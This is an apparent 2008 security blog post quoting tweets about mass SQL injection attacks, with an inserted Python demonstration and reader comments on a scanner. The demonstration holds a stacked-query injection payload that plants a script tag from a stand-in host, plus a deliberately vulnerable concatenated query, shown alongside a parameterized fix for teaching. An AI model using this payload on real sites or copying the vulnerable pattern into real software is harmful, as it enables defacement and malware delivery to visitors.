Tuesday, June 24, 2008

Twitter users angry about SQL Injection hacks on their websites

The mass SQL injection attacks have impacted the lives of a lot of Twitter users out there. I did a search for “SQL Injection” and the results are page after page of misery, time wasted cleaning things up, and cursing up a storm. You can really feel their pain, and the worst is probably not over yet: all that legacy code still has to be fixed. Here are some of my favorite tweets…

shartley: Cleaning yet another SQL injection attack. I'm F'n sick of cleaning up after lazy programming that took place during my year away.

jamesTWIT: To the hacker who designed the SQL injection bot: I hope you die, and not a fast death... something slow and painful. Like caught in a fire!
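As an added example, not from the post, the tweets or the commenters, here is what "fixing all that legacy code" means in practice, written in Python against an in-memory SQLite database. The 2008 bot's payload was a stacked T-SQL batch aimed at SQL Server; the payload below is a simplified, constructed stand-in with the same shape (a second statement smuggled in after the expected value, appending a script tag to every text column, with the rest of the query commented out). The product table, the rows, the tag's host name and the `execute_batch` helper that imitates a batch-executing driver are all assumptions made for the example.

```python
import sqlite3

# Constructed sample data standing in for a small product catalogue.
SAMPLE_ROWS = [
    (1, "Widget", "A fine widget."),
    (2, "Gadget", "A finer gadget."),
    (3, "Gizmo", "The finest gizmo."),
]

# Constructed stand-in for the bot's stacked-query payload (hypothetical host).
# It piggybacks an UPDATE onto a harmless-looking id and comments out the rest.
INJECTED_TAG = '<script src="http://evil.example/x.js"></script>'
PAYLOAD = "1;UPDATE products SET description = description || '" + INJECTED_TAG + "';--"


def fresh_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def split_statements(script):
    """Split a batch on ';' only where the prefix forms a complete statement,
    so a ';' inside a quoted string does not cut a statement in half."""
    stmts, buf = [], ""
    for ch in script:
        buf += ch
        if ch == ";" and sqlite3.complete_statement(buf):
            stmts.append(buf.strip())
            buf = ""
    if buf.strip():
        stmts.append(buf.strip())
    # Drop empty pieces and the trailing '--' comment an attacker appends.
    return [s for s in stmts if s and not s.startswith("--")]


def execute_batch(conn, script):
    """Imitate a driver that runs the whole string as a batch (the way classic
    ASP/ADO code against SQL Server did): every statement executes, and the
    rows of the last SELECT come back to the caller."""
    rows = None
    for stmt in split_statements(script):
        cur = conn.execute(stmt)
        if cur.description is not None:  # only SELECTs produce a result set
            rows = cur.fetchall()
    conn.commit()
    return rows


def lookup_vulnerable(conn, product_id):
    """Legacy pattern: the request parameter is concatenated into the SQL text.
    The page still renders the expected row, so nothing looks wrong."""
    sql = "SELECT name, description FROM products WHERE id = " + product_id
    return execute_batch(conn, sql)


def lookup_safe(conn, product_id):
    """Fixed pattern: the parameter travels as a bound value, never as SQL text.
    The payload string simply fails to match any integer id."""
    cur = conn.execute(
        "SELECT name, description FROM products WHERE id = ?", (product_id,)
    )
    return cur.fetchall()


def count_tainted(conn):
    """How many rows carry an injected script tag (what the victims were finding)."""
    cur = conn.execute("SELECT count(*) FROM products WHERE description LIKE '%<script%'")
    return cur.fetchone()[0]


def clean_up(conn, tag=INJECTED_TAG):
    """Strip one known injected tag and return the number of rows repaired.
    Only worthwhile once the injection point is fixed, or the bot comes back."""
    cur = conn.execute(
        "UPDATE products SET description = replace(description, ?, '') "
        "WHERE instr(description, ?) > 0",
        (tag, tag),
    )
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    db = fresh_db()
    print("legacy page returned:", lookup_vulnerable(db, PAYLOAD))
    print("rows tainted:", count_tainted(db))
    print("rows cleaned:", clean_up(db))
    safe = fresh_db()
    print("fixed page returned:", lookup_safe(safe, PAYLOAD))
    print("rows tainted:", count_tainted(safe))
```

The vulnerable lookup hands back the Widget row exactly as a legitimate request would, which is why site owners only noticed once every page started serving someone else's script; the parameterized version returns nothing for the payload and leaves the table alone.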

9 comments:

To all those angry Twitter users: find the SQL injection before the bot finds it for you. Check out http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/24/finding-sql-injection-with-scrawlr.aspx

Odd, based on the licensing restrictions, Scrawlr basically seems unusable. Maybe for like a REALLY small online store or something...

* Will only crawl up to 1500 pages
* Does not support sites requiring authentication
* Does not perform blind SQL injection
* Cannot retrieve database contents
* Does not support JavaScript or Flash parsing
* Will not test forms for SQL injection (POST parameters)

Oh, I dunno about that, whoever developed this payload is definitely no noob. http://isc.sans.org/diary.html?storyid=4565

Payload aside, I was more talking about the 1,500 page count limit. Unless your vulnerable webapp is within those URLs, well, you're outta luck I guess. And it's tough to compete with the crawling capabilities of Google, since that's essentially what's being used for target list acquisition.

Don't get me wrong, I'm not saying you should be giving anything more away for free, it just is what it is.

About Me

Jeremiah Grossman's career spans nearly 20 years; he has lived a literal lifetime in computer security and become one of the industry's biggest names. He has received a number of industry awards and been publicly thanked by Microsoft, Mozilla, Google, Facebook, and many others for his security research. Jeremiah has written hundreds of articles and white papers. As an industry veteran, he has been featured in hundreds of media outlets around the world. Jeremiah has been a guest speaker on six continents at hundreds of events, including many top universities. All of this came after Jeremiah served as an information security officer at Yahoo!